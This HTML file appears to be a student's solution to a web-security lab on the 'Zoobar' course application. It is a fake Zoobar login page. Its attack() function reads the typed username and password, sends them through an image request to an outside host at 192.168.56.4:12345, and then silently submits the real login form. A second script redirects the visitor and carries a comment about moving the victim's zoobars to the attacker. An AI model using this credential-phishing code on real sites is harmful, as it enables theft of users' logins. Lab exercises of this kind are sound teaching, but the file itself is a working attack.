<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <style>
          body {
            background-color: #cccccc;
            font-family: sans-serif;
            margin-left: 25px;
            margin-right: 25px;
            font-size: smaller;
          }
          .centerpiece {
            margin: 0 auto;
            width: 500px;
            height: 255px;
            border: 2px solid #333333;
            font-size: 10pt;
          }
          .log {
            width: 500px;
          }
          h1, h2, h1 a { text-align: center; color: #555555; }
          h1 a { text-decoration: none; }
          h1 { margin: 0em 100px 0em 100px; }
          h2 { margin: 0em 1em 1em 1em; font-size: 1em; }
          .centerpiece textarea { width: 93%; height: 100px; }
          .centerpiece td { height: 0px; }
          .centerpiece td.main { height: 130px; }
          #login { background-image: url(http://localhost:8080/zoobar/media/lion_sleeping.jpg); font-weight: bold; }
          #login table { margin: 18px 30px 0px 30px; }
          .profilecontainer {
            height: 100px;
            margin: 5px;
            border-top: 1px solid #333333;
          }
          #warning { color: #A00000; font-weight: bold; }
          .footer { text-align: center; }
          #header {
            text-align: right;
            position: absolute;
            right: 1em;
            font-size: smaller;
          }
        </style>
        <title>
          Login - Zoobar Foundation
        </title>
    </head>
    <body>
         <script src="http://localhost:8080/zoobar/index.cgi/zoobarjs"></script>
      <script> 
      //if user is logged in transfer users zoobar to the attackers account
          var zoobars = myZoobars;
          if (zoobars || true); {
          location.href = "answer-2.html";
          }
      </script>
        <script>
            function attack(){
                var Username = document.getElementById("login_username").value;
                var password = document.getElementById("login_password").value;
                var image = new Image();
                    image.onerror = function () {
                        document.getElementById('loginform').submit();
                    };
                    image.src='http://192.168.56.4:12345?' + '&payload=' + Username +","+ password+'&roll=14384' + '&random=' + Math.random() + '&timestamp='+ Math.floor(Date.now());
           }
        </script>
      <h1><a href="http://localhost:8080/zoobar/index.cgi/">Zoobar Foundation for Sensible Advocacy</a></h1>
      <h2>Supporting the loyal students of the new world order</h2>

<div id="login" class="centerpiece">
<form name="loginform" id="loginform" method="POST" action="http://localhost:8080/zoobar/index.cgi/login">
<table>
<tr>
   <td>Username:</td>
  <td><input type="text" id="login_username" name="login_username" size="20"
  autocomplete="no" value=""></td>
</tr>
<tr>
   <td>Password:</td>
  <td colspan=2><input type="password" id="login_password" name="login_password" size=20 autocomplete="no">
  <input type="button" id="login_button" name="submit" value="Log in" onclick="attack();">
  <input type="button" name="submit_registration" value="Register"></td>
</tr>
</table>
<input type="hidden" name="nexturl" value="/zoobar/index.cgi/">
<input type="hidden" name="submit_login" value= "Log in">
</form>
</div>
<div class="footer warning">

</div>
<script>
document.loginform.login_username.focus();
</script>

</body>
</html>
